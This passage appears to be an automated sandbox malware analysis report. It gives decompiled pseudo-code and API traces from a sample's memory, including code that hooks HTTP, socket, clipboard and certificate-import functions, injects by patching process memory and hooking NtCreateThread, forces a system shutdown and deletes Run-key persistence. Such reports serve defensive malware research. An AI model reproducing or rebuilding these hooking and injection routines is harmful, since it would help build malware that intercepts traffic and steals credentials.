					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x0040f377
0x0040f37c
0x0040f381
0x0040f383
0x0040f388
0x0040f38f
0x0040f396
0x0040f3b0
0x0040f3a3
0x0040f3a5
0x0040f3a5
0x0040f3ab
0x0040f3ab
0x0040f3b5
0x00000000
0x0040f3bb
0x0040f3c0

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040F37C
Thread32First.KERNEL32 ref: 0040F396
Thread32Next.KERNEL32 ref: 0040F3AB
CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 0040F3B5

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: f167ec629c316ef8e7e0489b20491c4ce64d70c5151b35724110d53dce581c98
Instruction ID: 47ccc5688c713e21e1b85cbc754401cc5076cbcf8c49e09458edf4030a5e9cdc
Opcode Fuzzy Hash: f167ec629c316ef8e7e0489b20491c4ce64d70c5151b35724110d53dce581c98
Instruction Fuzzy Hash: DBF082B2510115EADB30B6BA8C05DEF76ACDBC1374B000137FE21E22C5D638994686BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C961, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 0040C96A
bind.WS2_32(00000000,?,-0000001D), ref: 0040C98A
listen.WS2_32(00000000,?), ref: 0040C999
closesocket.WS2_32(00000000), ref: 0040C9A4

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: 70712e34430590b13c48ee905619d286c87f727d92cf5e7e1719adfaecf550a6
Instruction ID: ed0ed7285797de249a81ced6a17e3e2b72e0ea6a530c276d0029bd9c35f4a7d8
Opcode Fuzzy Hash: 70712e34430590b13c48ee905619d286c87f727d92cf5e7e1719adfaecf550a6
Instruction Fuzzy Hash: F4F03076200101AAE2201F39DD89E2F29A9AB857B1B144729FD61E25F0E73CC492D629

Uniqueness

Uniqueness Score: -1.00%

Function 00415300, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00415300() {
				void* __ecx;
				signed char _t6;
				unsigned int _t9;
				void* _t14;

				_t15 =  *0x41ac60 & 0x00000008;
				if(( *0x41ac60 & 0x00000008) != 0) {
					E00408E58(_t14, _t15);
				}
				_t6 =  *0x41ac60; // 0x0
				if((_t6 & 0x00000003) == 0) {
					__eflags = _t6 & 0x00000004;
					if((_t6 & 0x00000004) != 0) {
						return ExitWindowsEx(0x14, 0x80000000);
					}
					return _t6;
				} else {
					E0040F3C3(L"SeShutdownPrivilege");
					_t9 =  *0x41ac60; // 0x0
					__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t9 >> 0x00000001 & 0x00000001, 0x80000000);
					return 0;
				}
			}

0x00415301
0x00415308
0x0041530a
0x0041530a
0x0041530f
0x00415316
0x00415341
0x00415343
0x00000000
0x0041534c
0x00415353
0x00415318
0x0041531d
0x00415322
0x00415339
0x00415340
0x00415340

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 00415339

Part of subcall function 00408E58: PathRemoveFileSpecW.SHLWAPI(?,00000000), ref: 00408E7F
Part of subcall function 00408E58: PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00408E92
Part of subcall function 00408E58: SHDeleteValueW.SHLWAPI(80000001,Software\Microsoft\Windows\Currentversion\Run,00000000,FF220823,00000000,00000000,00000000), ref: 00408EC6
Part of subcall function 00408E58: Sleep.KERNEL32(000001F4), ref: 00408ED5
Part of subcall function 00408E58: SHDeleteKeyW.SHLWAPI(80000001,?,00000002), ref: 00408F1F
Part of subcall function 00408E58: CharToOemW.USER32 ref: 00408F3B
Part of subcall function 00408E58: CharToOemW.USER32 ref: 00408F4A
Part of subcall function 00408E58: ExitProcess.KERNEL32 ref: 00408F98

ExitWindowsEx.USER32(00000014,80000000), ref: 0041534C

Strings

SeShutdownPrivilege, xrefs: 00415318

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CharDeleteExitFilePathRemoveSpec$InitiateProcessShutdownSleepSystemValueWindows
String ID: SeShutdownPrivilege
API String ID: 526012596-3733053543
Opcode ID: 9a206f1256d4e2171c0299b9aa3478b057f90b5e2fcde28635703dfaca5ebcf6
Instruction ID: 1b00e2299b31ef3c9a9203ecf18d4972554ae16369f4e30f4f425ce5efb7265d
Opcode Fuzzy Hash: 9a206f1256d4e2171c0299b9aa3478b057f90b5e2fcde28635703dfaca5ebcf6
Instruction Fuzzy Hash: DBE09272110A48AAEA0457649C4DFF62618A701B54F1C803EBEA2F56E1CFB84850D76D

Uniqueness

Uniqueness Score: -1.00%

Function 00404ACF, Relevance: 4.6, APIs: 3, Instructions: 61
injectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ACF(char __eax, void* __ecx) {
				char _v5;
				char _v6;
				long _v12;
				char _v16;
				void* _v20;
				void* _t19;
				signed int _t28;
				intOrPtr* _t34;
				void* _t37;

				_v6 = 1;
				if(__eax > 0) {
					_t34 = __ecx + 8;
					_v16 = __eax;
					do {
						_t19 =  *_t34;
						_v20 = _t19;
						if(_t19 != 0) {
							_t4 = _t34 - 8; // 0x774c084
							_t37 =  *_t4;
							_t5 = _t34 + 4; // 0xffffd536
							_t28 =  *_t5 & 0x000000ff;
							_v5 = 0;
							if(E0040F1C2(_t37) < 0x1e || VirtualProtectEx(0xffffffff, _t37, 0x1e, 0x40,  &_v12) == 0) {
								L8:
								_v6 = 0;
							} else {
								if(WriteProcessMemory(0xffffffff, _t37, _v20, _t28 + 0xfffffffb, 0) != 0) {
									_v5 = 1;
								}
								VirtualProtectEx(0xffffffff, _t37, 0x1e, _v12,  &_v12);
								if(_v5 == 0) {
									goto L8;
								}
							}
						}
						_t34 = _t34 + 0x10;
						_t14 =  &_v16;
						 *_t14 = _v16 - 1;
					} while ( *_t14 != 0);
				}
				return _v6;
			}

0x00404ad5
0x00404adb
0x00404ae6
0x00404ae9
0x00404aec
0x00404aec
0x00404aee
0x00404af3
0x00404af5
0x00404af5
0x00404af8
0x00404af8
0x00404afe
0x00404b0a
0x00404b53
0x00404b53
0x00404b21
0x00404b35
0x00404b37
0x00404b37
0x00404b47
0x00404b51
0x00000000
0x00000000
0x00404b51
0x00404b0a
0x00404b57
0x00404b5a
0x00404b5a
0x00404b5a
0x00404b61
0x00404b66

APIs

Part of subcall function 0040F1C2: VirtualQueryEx.KERNEL32(000000FF,0774C084,?,0000001C,00407790,0774C084,?,?,?,00404B07,00000000,00000000,00000012,00419020), ref: 0040F1D7

VirtualProtectEx.KERNEL32(000000FF,0774C084,0000001E,00000040,00407798,00000000,00000000,00000012,00419020), ref: 00404B17
WriteProcessMemory.KERNEL32(000000FF,0774C084,00000000,FFFFD43B,00000000), ref: 00404B2D
VirtualProtectEx.KERNEL32(000000FF,0774C084,0000001E,00407798,00407798), ref: 00404B47

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Virtual$Protect$MemoryProcessQueryWrite
String ID:
API String ID: 2789181485-0
Opcode ID: 26b50c01a02812a2d6a86d8d59b5b5736a5ff8fe8426d9e9b1b4af505c149573
Instruction ID: fdbbd4a742bd5c088ddcb12c68aa649a7ddd15408f3d92e008fc95d6a5c51c48
Opcode Fuzzy Hash: 26b50c01a02812a2d6a86d8d59b5b5736a5ff8fe8426d9e9b1b4af505c149573
Instruction Fuzzy Hash: C11108B1E042897AEB1097A98C04BDFBFB89F45374F1442A6E630B22D1C778D944C764

Uniqueness

Uniqueness Score: -1.00%

Function 0040344C, Relevance: 4.6, APIs: 3, Instructions: 59
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040344C(void* __ecx, void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				void _v28;
				long _v32;
				intOrPtr _v40;
				void* __edi;
				void* __esi;
				void* _t17;
				void* _t24;
				void* _t29;
				void* _t31;
				void* _t33;
				void* _t37;

				_t31 = __edx;
				_t29 = __ecx;
				_t17 = E00407B3F();
				_t33 = _a16;
				if(_t17 != 0 && NtQueryInformationProcess(_t33, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E0040F36F(_v28) == 0)) {
					_t37 = E0040797B(_t29, _t31, _v28);
					_t46 = _t37;
					if(_t37 != 0) {
						_t24 = E00407A4C(_t29, _t33, _t37, _t46, _t37, 0);
						if(_t24 != 0) {
							 *((intOrPtr*)(_a24 + 0xb0)) = _t24 -  *0x4192e4 + E00407F43;
						}
						CloseHandle(_t37);
					}
				}
				E00407B30();
				return NtCreateThread(_a4, _a8, _a12, _t33, _a20, _a24, _a28, _a32);
			}

0x0040344c
0x0040344c
0x00403457
0x0040345c
0x00403461
0x004034a0
0x004034a2
0x004034a4
0x004034a9
0x004034b0
0x004034c0
0x004034c0
0x004034c7
0x004034c7
0x004034a4
0x004034cd
0x004034f3

APIs

Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00403472
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 004034C7

Part of subcall function 0040F36F: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040F37C
Part of subcall function 0040F36F: Thread32First.KERNEL32 ref: 0040F396
Part of subcall function 0040F36F: CloseHandle.KERNEL32(00000000,00000000,0000001C,00000000,?,00000004,00000000,?), ref: 0040F3B5

NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 004034E8

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
String ID:
API String ID: 3154080929-0
Opcode ID: 2761cff95fa166759bebcb4aa842a57fcbbdd640e82233aeda5ac450ef6b62f8
Instruction ID: 4bd36c88d60e0a7c6a905535dd692b24cbb0113c4165deea47f68822682f32ad
Opcode Fuzzy Hash: 2761cff95fa166759bebcb4aa842a57fcbbdd640e82233aeda5ac450ef6b62f8
Instruction Fuzzy Hash: 93118131924205ABCB12AF51DC05FAB3B69AF45705F04423AF944B51E0D739DA11DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC51, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 0040CC5A
bind.WS2_32(00000000,00000017,-0000001D), ref: 0040CC7A
closesocket.WS2_32(00000000), ref: 0040CC85

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: 33c749d1f7e24bcc6b39e651dbe84e6eed1318190367da391c55015d580aafda
Instruction ID: 7669656143e3fa2b294f97f418d307bd0995f9ad104b1e7561b3365cfa2af3d7
Opcode Fuzzy Hash: 33c749d1f7e24bcc6b39e651dbe84e6eed1318190367da391c55015d580aafda
Instruction Fuzzy Hash: 09E04F26200515A6F2202B39ED4EA6F25A99B85771B280729BD75E21E1E77C88819124

Uniqueness

Uniqueness Score: -1.00%

Function 0040F810, Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040F810(char* __esi) {
				void* _v40;
				intOrPtr _v46;
				signed char _v48;
				struct _OSVERSIONINFOW _v324;
				int _t15;
				signed int _t18;
				short _t22;
				char* _t24;

				_t24 = __esi;
				E00409898(__esi, 6);
				_v324.dwOSVersionInfoSize = 0x11c;
				_t15 = GetVersionExW( &_v324);
				if(_t15 != 0) {
					__imp__GetNativeSystemInfo( &_v40);
					 *__esi = E0040F73A();
					_t18 = 0;
					if(_v48 <= 0xff && _v46 == 0) {
						_t18 = _v48 & 0x000000ff;
					}
					 *(_t24 + 1) = _t18;
					asm("sbb eax, eax");
					 *((short*)(_t24 + 2)) =  !0xffff & _v324.dwBuildNumber;
					_t22 = _v40;
					 *((short*)(_t24 + 4)) = _t22;
					return _t22;
				}
				return _t15;
			}

0x0040f810
0x0040f81c
0x0040f828
0x0040f832
0x0040f83a
0x0040f840
0x0040f84b
0x0040f852
0x0040f858
0x0040f860
0x0040f860
0x0040f864
0x0040f872
0x0040f87c
0x0040f880
0x0040f884
0x00000000
0x0040f884
0x0040f889

APIs

GetVersionExW.KERNEL32(?,?,00000006), ref: 0040F832
GetNativeSystemInfo.KERNEL32(?), ref: 0040F840

Part of subcall function 0040F73A: GetVersionExW.KERNEL32(?,00000000), ref: 0040F759

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Version$InfoNativeSystem
String ID:
API String ID: 2518960133-0
Opcode ID: 9c29b827f22e575af9015e86294a178a685f2c8f9935fa3d3f02acf626f85291
Instruction ID: 4c9715b61aedd603feeec6df2d52423eec6b4558fe666b08631694fbdbaa6ecf
Opcode Fuzzy Hash: 9c29b827f22e575af9015e86294a178a685f2c8f9935fa3d3f02acf626f85291
Instruction Fuzzy Hash: 6C0186359002558ADB31EFB5C8016DDB7F4AF08700F04C47AD555F3691E7389A45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041000E, Relevance: 1.5, APIs: 1, Instructions: 41
comCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041000E(void* __ecx) {
				void* _v8;
				char* _t12;
				intOrPtr _t13;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				void* _t27;

				_t12 =  &_v8;
				_v8 = 0;
				__imp__CoCreateInstance(0x4013f8, 0, 0x4401, 0x4013e8, _t12, _t27, __ecx);
				if(_t12 != 0) {
					_t13 = 0;
				} else {
					_t14 = _v8;
					 *((intOrPtr*)( *_t14 + 0xfc))(_t14, 0);
					_t16 = _v8;
					 *((intOrPtr*)( *_t16 + 0x120))(_t16, 0);
					_t18 = _v8;
					 *((intOrPtr*)( *_t18 + 0x118))(_t18, 0);
					_t20 = _v8;
					 *((intOrPtr*)( *_t20 + 0x110))(_t20, 0xffffffff);
					_t13 = _v8;
				}
				return _t13;
			}

0x00410013
0x00410029
0x0041002c
0x00410034
0x00410070
0x00410036
0x00410036
0x0041003d
0x00410043
0x0041004a
0x00410050
0x00410057
0x0041005d
0x00410065
0x0041006b
0x0041006b
0x00410074

APIs

CoCreateInstance.OLE32(004013F8,00000000,00004401,004013E8,?,?,?,?,00410087,?,?,?,?,00405EBD,?,?), ref: 0041002C

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 54c140d9d07095d6e411c4dbcdfcf86d96e6f9ec4e4d4b5a9dac7fbc9e287d61
Instruction ID: 01f3b6a20daedb2ce8c8538526029bd1b8293e8301c767b16616f8f823f4850d
Opcode Fuzzy Hash: 54c140d9d07095d6e411c4dbcdfcf86d96e6f9ec4e4d4b5a9dac7fbc9e287d61
Instruction Fuzzy Hash: 1701FB74A00218FFDB14CBA5C94DEDB7BBCEF49350F2001A5F805EB290D675AE01DA64

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 1.5, APIs: 1, Instructions: 21
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t12;
				void* _t14;

				_t12 = _t14 - 0x78;
				_t7 = GetTimeZoneInformation(_t12 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t12 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t12 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x00409922
0x00409930
0x00409939
0x00409943
0x00409952
0x00409945
0x00409945
0x00000000
0x00409945
0x0040993b
0x0040993b
0x00409948
0x0040994d
0x0040994d
0x00409958

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 00409930

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 71c243f59b7b7fe53b86fcbf7f0dda3a94e9e9df00154b385325f1dd7b959907
Instruction ID: 547fc9c690d88fc5e43e67ddb9578f59667ae86ff06400956070093446b39d7c
Opcode Fuzzy Hash: 71c243f59b7b7fe53b86fcbf7f0dda3a94e9e9df00154b385325f1dd7b959907
Instruction Fuzzy Hash: 51E08671644109CBDB64EBA4DE8199E77F9AB05314F30053AE551F23D1D238DD45CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00404CCE, Relevance: 1.3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00404CCE() {
				intOrPtr _t1;
				intOrPtr _t2;
				signed int _t19;
				void* _t21;
				void* _t22;

				_t1 =  *0x4192f4;
				if(_t1 == 0) {
					_t1 =  *0x4192f0;
					 *0x419024 = E0040344C;
				} else {
					 *0x419024 = E004034F6;
				}
				 *0x419020 = _t1;
				_t2 =  *0x419304; // 0x77e27840
				 *0x419030 = _t2;
				 *0x419040 = GetFileAttributesExW;
				 *0x419050 = HttpSendRequestW;
				 *0x419060 = HttpSendRequestA;
				 *0x419070 = HttpSendRequestExW;
				 *0x419080 = HttpSendRequestExA;
				 *0x419090 = InternetCloseHandle;
				 *0x4190a0 = InternetReadFile;
				 *0x4190b0 = __imp__InternetReadFileExA;
				 *0x4190c0 = InternetQueryDataAvailable;
				 *0x4190d0 = HttpQueryInfoA;
				 *0x4190e0 = __imp__#3;
				 *0x4190f0 = __imp__#19;
				 *0x419100 = __imp__WSASend;
				 *0x419110 = TranslateMessage;
				_push(1);
				 *0x419120 = GetClipboardData;
				_push(0x419020);
				 *0x419130 = __imp__PFXImportCertStore;
				_t19 = 0x12;
				return E00404B67(_t19, _t21, _t22);
			}

0x00404cce
0x00404cd5
0x00404ce3
0x00404ce8
0x00404cd7
0x00404cd7
0x00404cd7
0x00404cf2
0x00404cf7
0x00404cfc
0x00404d06
0x00404d10
0x00404d1a
0x00404d24
0x00404d2e
0x00404d38
0x00404d42
0x00404d4c
0x00404d56
0x00404d60
0x00404d6a
0x00404d74
0x00404d7e
0x00404d88
0x00404d92
0x00404d94
0x00404d9e
0x00404da5
0x00404daa
0x00404db0

Strings

@xw, xrefs: 00404CF7

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID:
String ID: @xw
API String ID: 0-2821512424
Opcode ID: 0969e254e03a2270fea158f6c43fdf33fb151ae1608f7024747e2f362ae41a72
Instruction ID: be441782d3f59f62b8afdcf9d7c29dff139ab07449f0e4a564e049814f0b3567
Opcode Fuzzy Hash: 0969e254e03a2270fea158f6c43fdf33fb151ae1608f7024747e2f362ae41a72
Instruction Fuzzy Hash: 6B21B2B8A452419FE384CF68EAA5B803BF4B34C744705827AE949E7771E375AD40DB0C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C570, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0040C570(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 <= 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 <= 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 <= 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

0x0040c577
0x0040c57b
0x0040c580
0x0040c582
0x0040c585
0x00000000
0x0040c58c
0x0040c58e
0x0040c5a1
0x0040c5a3
0x0040c5a6
0x0040c5a7
0x0040c590
0x0040c590
0x0040c597
0x0040c597
0x0040c5ac
0x0040c5b7
0x0040c5ba
0x0040c5bd
0x0040c5be
0x0040c5be
0x00000000
0x0040c5be
0x0040c5c3
0x0040c5ca
0x0040c5cc
0x0040c5da
0x0040c5e1
0x0040c5e4
0x0040c5e5
0x0040c5ce
0x0040c5ce
0x0040c5d5
0x0040c5d5
0x0040c5ee
0x0040c5f3
0x0040c601
0x0040c608
0x0040c60b
0x0040c60c
0x0040c5f5
0x0040c5f5
0x0040c5fc
0x0040c5fc
0x0040c60f
0x0040c613
0x0040c619
0x0040c61b
0x0040c63a
0x0040c63a
0x0040c63f
0x0040c650
0x0040c655
0x0040c65d
0x0040c65e
0x0040c641
0x0040c641
0x0040c64b
0x0040c64b
0x0040c663
0x0040c671
0x0040c678
0x0040c67b
0x0040c67c
0x0040c665
0x0040c665
0x0040c66c
0x0040c66c
0x0040c682
0x0040c685
0x0040c68a
0x0040c68c
0x0040c693
0x0040c695
0x0040c6a8
0x0040c6aa
0x0040c6ad
0x0040c6ae
0x0040c697
0x0040c697
0x0040c69e
0x0040c69e
0x0040c6b7
0x0040c6bc
0x0040c6ca
0x0040c6d1
0x0040c6d4
0x0040c6d5
0x0040c6be
0x0040c6be
0x0040c6c5
0x0040c6c5
0x0040c6d8
0x0040c6dc
0x0040c6dc
0x0040c6e8
0x0040c6ec
0x0040c6ef
0x0040c6f7
0x0040c6fc
0x0040c702
0x0040c705
0x0040c706
0x0040c709
0x0040c711
0x0040c714
0x0040c715
0x0040c718
0x0040c718
0x0040c718
0x0040c71d
0x00000000
0x0040c71d
0x0040c62a
0x0040c62c
0x0040c630
0x0040c636
0x0040c637
0x00000000
0x0040c637
0x0040c725
0x0040c730
0x0040c737
0x0040c737

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
